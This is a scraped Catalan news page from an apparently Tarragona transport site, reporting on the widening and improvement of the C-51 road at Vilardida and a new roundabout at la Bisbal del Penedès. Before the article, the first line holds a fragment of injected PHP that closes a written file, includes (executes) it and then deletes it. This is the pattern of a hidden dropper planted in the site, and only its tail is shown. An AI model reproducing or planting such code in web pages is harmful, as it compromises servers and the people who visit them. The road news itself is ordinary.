");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Les obres de millora i eixamplament de la carretera C-51 a Vilardida finalitzaran el novembre
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Les obres de millora i eixamplament de la carretera C-51 a Vilardida finalitzaran el novembre (24/09/2020)

El director d’Infraestructures de Mobilitat, Xavier Flores, ha visitat avui l’última fase dels treballs de condicionament de la C-51 al seu pas per Vilardida (Alt Camp), juntament amb els alcaldes de Bràfim, Xavier Rius; Rodonyà, Enric Ferré; i Montferri, Josep Ruiz; la primera Tinenta d’Alcalde de Vila-rodona, Marta Alegret; i la directora dels Serveis Territorials de Territori i Sostenibilitat a Tarragona, Trini Castro. Durant la visita, el director ha explicat que les obres, que compten amb una inversió de 6,5 MEUR, finalitzaran a principis de novembre.

El Departament de Territori i Sostenibilitat té en execució des de la tardor passada els treballs per eixamplar i millorar el traçat de la C-51 en un tram de prop de 2,5 quilòmetres a Vilardida, amb l’objectiu d’afavorir la comoditat i la seguretat en la conducció. El gruix de l’obra ja està executat i en les pròximes setmanes conclouran les tasques d’aglomerat i de senyalització vertical i horitzontal.

En concret, els treballs consisteixen en:

• Eixamplament de la carretera en el tram que fins ara tenia 6,2 metres d’amplada, fins als 10 metres previstos, amb dos carrils per a la circulació de 3,5 metres d’amplada i dos vorals d’1,5 metres.

• Millora de revolts al llarg del recorregut i construcció d’una petita variant de traçat –d’uns 500 metres de longitud– a la zona de l’encreuament amb la carretera de Montferri (T-204). Aquesta variant es desplaça cap al sud de la carretera actual i inclou la formació d’un tercer carril central per accedir a la T-204 i un altre per accedir a l’actual C-51, a la zona del nucli de Vilardida. A partir del tercer carril central, s’executa un tram d’uns 170 metres de nova carretera T-204.

• Millora de l'actual pont sobre el riu Gaià pel pas del tronc de la carretera, tot reparant els voladissos i formant dos carrils de 3,5 metres i dos vorals d’1,2 metres.

• Formació de nous accessos a la rotonda de la carretera de Bràfim, on hi ha una benzinera, zona de rentat i un restaurant.

• Construcció de nous camins a cada costat de la carretera, per a permetre l’accessibilitat als terrenys propers. En total, es preveuen uns 4 quilòmetres de camins.

• Construcció de passos per a donar continuïtat al trànsit de vehicles agrícoles. L’obra inclou un nou pont sobre el riu Gaià, el creuament amb un pas inferior tipus calaix amb el camí de les Terres del Gaià i un nou pas inferior per a l’accés a Vilardida dels vehicles agrícoles.

Nova rotonda a la Bisbal del Penedès
L’obra inclou la construcció d’una nova rotonda en un altre àmbit de la C-51, a la Bisbal del Penedès, per a millorar la connexió amb la T-240. Aquesta actuació també comporta la modificació d’uns 400 metres del traçat de la T-240. Ens aquests moments, s’està treballant en la finalització de les cunetes, biones i vorades de l’interior de la rotonda. Les tasques pendents per a completar-la corresponen a l’enllumenat, la pavimentació final i la senyalització horitzontal i vertical.

Font: Departament de Territori i Sostenibiltat

Les obres de millora i eixamplament de la carretera C-51 a Vilardida finalitzaran el novembre

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona